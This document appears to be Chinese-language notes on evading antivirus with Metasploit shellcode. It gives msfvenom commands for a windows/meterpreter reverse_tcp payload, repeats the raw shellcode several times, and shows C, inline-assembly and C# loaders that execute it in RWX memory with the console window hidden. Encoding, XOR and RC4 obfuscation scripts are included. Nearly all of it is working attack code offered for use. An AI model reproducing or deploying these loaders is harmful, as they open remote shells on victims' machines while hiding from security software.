"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x78\x19\xfa\x31\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
单纯编译(不行)
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x78\x19\xfa\x31\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
main()
{
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}
直接生成即可,这样子,过不了啥,只能过个管家
汇编执行,再次生成
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")
unsigned char shellcode[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x89\xe5\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x31\xff\x0f\xb7\x4a\x26"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x78\x19\xfa\x31\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
void main()
{
__asm
{
mov eax, offset shellcode
jmp eax
}
}
编码加密
生成编码过后的Shellcode
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=xxx.xxx.xxx.xxx lport=6688 -f c
unsigned char buf[] =
"\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x44\x48\x53\x5a\x49\x74"
"\x53\x4d\x49\x6e\x6c\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33"
"\x49\x6f\x4d\x66\x38\x50\x74\x30\x6f\x6d\x4d\x63\x43\x73\x50"
"\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a"
"\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48"
"\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x55\x49"
"\x74\x59\x49\x41\x48\x54\x69\x30\x67\x59\x68\x63\x6c\x30\x50"
"\x44\x48\x2f\x53\x59\x73\x30\x69\x77\x48\x57\x4d\x63\x44\x42"
"\x7a\x77\x32\x73\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33"
"\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64"
"\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42"
"\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a"
"\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44"
"\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33"
"\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f"
"\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f"
"\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x65\x42\x6e"
"\x36\x4d\x57\x67\x43\x41\x42\x6f\x67\x69\x65\x5a\x51\x55\x46"
"\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f"
"\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68"
"\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a"
"\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32"
"\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e"
"\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71"
"\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f"
"\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59"
"\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61"
"\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f"
"\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51"
"\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77"
"\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56"
"\x6d\x6f\x41\x55\x2f\x2f\x56";
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口
加密混淆(人菜没成功,放个代码以后研究)
import re
raw = r"""
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89\xe5"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58\x20\x50\x01\xd3"
"\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x31\xff\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x78\x19\xfa\x31\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
"""
regx = re.compile(r"\\x\w\w")
arr = re.findall(regx,raw)
for i in range(0,len(arr)):
arr[i] = arr[i].replace("\\","0")
data = """
#include <windows.h>
#pragma comment(linker, "/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")
void test()
{
unsigned char buf[333];
"""
data = data + " "
print(len(arr))
for i in range(len(arr)):
data = data + "buf["+ str(i) +"] = " + arr[i] + "^ 0x5f ^ 0x5f; "
if(i%100 == 0):
data = data + "\r\n "
data = data + """
((void(*)(void))&buf)();
}
int main(int argc, char* argv[])
{
test();
return 0;
}
"""
f = open("shellcode.txt","w")
f.write(data)
#分离加载
利用思路:编译接受执行加载器,进行Shellcode参数传递调用执行
https://github.com/DimopoulosElias/SimpleShellcodeInjector
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6688 -f c -o msf.txt
cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
"i686-w64-mingw32-c++.exe" SimpleShellcodeInjector.c -o ssi.exe
#C/C++/Python_Shellcode-Sock
利用思路:建立客户端和服务端,Shellcode以数据发送接收执行
C#
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=6688 -f csharp
byte[] buf = new byte[354] {
0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,
0x0c,0x89,0xe5,0x8b,0x52,0x14,0x31,0xff,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x57,0x01,0xd0,0x8b,0x40,0x78,
0x85,0xc0,0x74,0x4c,0x01,0xd0,0x50,0x8b,0x58,0x20,0x8b,0x48,0x18,0x01,0xd3,
0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xc1,
0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x78,0x19,0xfa,0x31,0x68,0x02,
0x00,0x1a,0x20,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };
using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
class Program
{
static void Main(string[] args)
{
// native function’s compiled code
// generated with metasploit
byte[] shellcode = new byte[354] {
0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,
0x0c,0x89,0xe5,0x8b,0x52,0x14,0x31,0xff,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x57,0x01,0xd0,0x8b,0x40,0x78,
0x85,0xc0,0x74,0x4c,0x01,0xd0,0x50,0x8b,0x58,0x20,0x8b,0x48,0x18,0x01,0xd3,
0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xc1,
0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x78,0x19,0xfa,0x31,0x68,0x02,
0x00,0x1a,0x20,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}
}
C#_Shellcode-加密编译
加密脚本
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace Payload_Encrypt_Maker
{
class Program
{
// 加密密钥,可以更改,加解密源码中保持KEY一致就行
static byte[] KEY = { 0x33, 0x11, 0x33, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x33, 0x01, 0x33, 0x33, 0x00, 0x00 };
static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
static byte[] payload = {0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,
0x0c,0x89,0xe5,0x8b,0x52,0x14,0x31,0xff,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x57,0x01,0xd0,0x8b,0x40,0x78,
0x85,0xc0,0x74,0x4c,0x01,0xd0,0x50,0x8b,0x58,0x20,0x8b,0x48,0x18,0x01,0xd3,
0x85,0xc9,0x74,0x3c,0x49,0x8b,0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xc1,
0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x78,0x19,0xfa,0x31,0x68,0x02,
0x00,0x1a,0x20,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5}; // 替换成MSF生成的shellcode
private static class Encryption_Class
{
public static string Encrypt(string key, string data)
{
Encoding unicode = Encoding.Unicode;
return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
}
public static byte[] Encrypt(byte[] key, byte[] data)
{
return EncryptOutput(key, data).ToArray();
}
private static byte[] EncryptInitalize(byte[] key)
{
byte[] s = Enumerable.Range(0, 256)
.Select(i => (byte)i)
.ToArray();
for (int i = 0, j = 0; i < 256; i++)
{
j = (j + key[i % key.Length] + s[i]) & 255;
Swap(s, i, j);
}
return s;
}
private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
{
byte[] s = EncryptInitalize(key);
int i = 0;
int j = 0;
return data.Select((b) =>
{
i = (i + 1) & 255;
j = (j + s[i]) & 255;
Swap(s, i, j);
return (byte)(b ^ s[(s[i] + s[j]) & 255]);
});
}
private static void Swap(byte[] s, int i, int j)
{
byte c = s[i];
s[i] = s[j];
s[j] = c;
}
}
static void Main(string[] args)
{
byte[] result = Encryption_Class.Encrypt(KEY, payload);
int b = 0;
for (int i = 0; i < result.Length; i++)
{
b++;
if (i == result.Length + 1)
{ Console.Write(result[i].ToString()); }
if (i != result.Length) { Console.Write(result[i].ToString() + ","); }
}
}
}
}
C:\Users\18536\source\repos\ConsoleApp2\ConsoleApp2\bin\Debug>ConsoleApp2.exe
131,215,102,95,43,231,85,224,249,228,211,81,52,51,180,142,173,177,196,6,207,183,102,60,237,142,118,207,230,18,23,123,124,244,242,200,206,148,146,88,44,31,218,145,167,138,234,147,191,8,204,84,241,157,62,61,185,206,246,111,81,242,96,71,176,238,157,252,136,37,41,216,99,173,43,145,5,35,227,107,96,133,223,23,66,119,103,104,135,218,122,111,195,165,236,71,118,252,35,26,205,206,200,51,213,96,82,62,205,179,168,69,49,15,171,55,136,51,8,170,188,212,61,187,151,110,53,164,42,246,246,198,120,143,186,82,56,41,96,12,24,242,22,213,73,8,153,94,33,16,2,84,118,150,172,122,49,141,156,144,86,108,74,135,143,5,234,228,243,182,84,159,105,246,223,46,35,95,152,64,124,47,50,59,119,89,48,145,144,66,6,197,224,52,148,17,143,132,2,22,116,200,135,44,245,113,246,149,154,205,118,108,232,218,187,141,17,67,49,158,143,191,97,120,58,206,21,34,64,185,105,90,218,211,188,182,87,185,143,112,138,239,208,157,164,170,242,200,60,133,13,49,15,12,47,23